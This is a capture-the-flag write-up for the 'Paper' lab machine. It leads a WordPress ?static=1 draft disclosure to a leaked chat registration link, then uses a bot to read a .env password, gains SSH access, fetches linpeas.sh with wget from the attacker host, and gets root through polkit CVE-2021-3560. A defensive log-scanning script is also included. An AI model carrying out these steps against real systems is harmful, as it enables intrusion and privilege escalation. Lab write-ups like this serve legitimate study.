Paper
Paper Linux · Easy - Adventure mode
🔭 Reconnaissance:
└─$ nmap -p- -sSVC --min-rate 5000 10.129.136.31
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-08 11:30 +0100
Nmap scan report for 10.129.136.31
Host is up (0.046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
HTTP/1.1 403 Forbidden
Date: Sun, 08 Feb 2026 10:56:13 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Capturing the traffic with ZAP proxy, the subdomain office.paper shows up in the response (the X-Backend-Server header).
Wappalyzer tells us it is an old WordPress version, 5.2.3.
💣 Preparation:
https://www.exploit-db.com/exploits/47690
👽 Actions:
The exploit is very simple: we append ?static=1 just as the exploit suggests, and we get to see relevant information
test
Micheal please remove the secret from drafts for gods sake!
Hello employees of Blunder Tiffin,
Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
So, I kindly request you all to take your discussions from the public blog to a more private chat system.
-Nick
# Warning for Michael
Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
Threat Level Midnight
A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT
[INT:DAY]
Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….
# Secret Registration URL of new Employee chat system
http://chat.office.paper/register/8qozr226AhkCHZdyY
# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
# Also, stop looking at my drafts. Jeez!
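Detection-side counterpart to the ?static=1 draft disclosure used above and to the TRACE method nmap flagged, added here as an example and not part of the original writeup: it parses Apache combined-format access-log lines and flags both patterns. The sample lines, IPs and timestamps are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache combined-format lines (not real traffic from the writeup).
SAMPLE_LOG = """\
10.10.15.67 - - [08/Feb/2026:11:32:01 +0100] "GET / HTTP/1.1" 403 199691 "-" "Mozilla/5.0"
10.10.15.67 - - [08/Feb/2026:11:40:12 +0100] "TRACE / HTTP/1.1" 200 312 "-" "curl/8.4.0"
10.10.15.67 - - [08/Feb/2026:11:45:30 +0100] "GET /?static=1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.10.15.67 - - [08/Feb/2026:11:46:02 +0100] "GET /index.php?static=1&order=asc HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.10.15.67 - - [08/Feb/2026:11:50:00 +0100] "GET /index.php?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_request(method, target):
    """Return a list of finding labels for one request (empty if nothing suspicious)."""
    findings = []
    if method.upper() == "TRACE":
        findings.append("TRACE method answered (cross-site tracing exposure)")
    # Parse the query string properly instead of substring-matching the URL,
    # so "?static=1" is caught on any path and "?statics=10" is not.
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "1" in qs.get("static", []):
        findings.append("WordPress 5.2.3 ?static=1 draft/private-post disclosure probe (exploit-db 47690)")
    return findings


def scan_log(text):
    """Parse combined-format lines; return (ip, ts, method, target, status, findings) for flagged ones."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        findings = flag_request(m["method"], m["target"])
        if findings:
            hits.append((m["ip"], m["ts"], m["method"], m["target"], int(m["status"]), findings))
    return hits


if __name__ == "__main__":
    for ip, ts, method, target, status, findings in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {method} {target} -> {status}: {'; '.join(findings)}")
```

On the server side the TRACE finding goes away with Apache's `TraceEnable Off` directive, and the draft disclosure with upgrading WordPress past 5.2.3.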
This leads us to add the domain chat.office.paper to our /etc/hosts and then visit http://chat.office.paper/register/8qozr226AhkCHZdyY
It seems this chat has a bot we can send commands to, so it looks like we have to play with it.
So I keep playing with the bot
And we can see that we can access files belonging to the user dwight.
Finally I find a file hubot/.env with information such as a password: Queenofblad3s!23
└─$ ssh dwight@10.129.136.31
The authenticity of host '10.129.136.31 (10.129.136.31)' can't be established.
ED25519 key fingerprint is: SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.136.31' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
dwight@10.129.136.31's password:
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ cat user.txt
461cc6744c4d4410************
[dwight@paper ~]$ wget http://10.10.15.67/linpeas.sh
--2026-02-08 13:45:56-- http://10.10.15.67/linpeas.sh
Connecting to 10.10.15.67:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 975444 (953K) [application/x-sh]
Saving to: ‘linpeas.sh’
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
Vulnerable to CVE-2021-3560
We reuse the password to log in as the user dwight. linpeas.sh indicates there is a CVE affecting the polkit binary
CVE: CVE-2021-3560
💣 Preparation:
https://github.com/tufanturhan/Polkit-Linux-Priv
[dwight@paper ~]$ /usr/bin/python3 cve.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005
[+] Timed out at: 0.007819500594330517
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
bash: cannot set terminal process group (54398): Inappropriate ioctl for device
bash: no job control in this shell
[root@paper dwight]# cat /root/root.txt
4fa0d42cb3c75c0fd************
Since it is a Python script, it is enough to copy the content and paste it into the nano editor.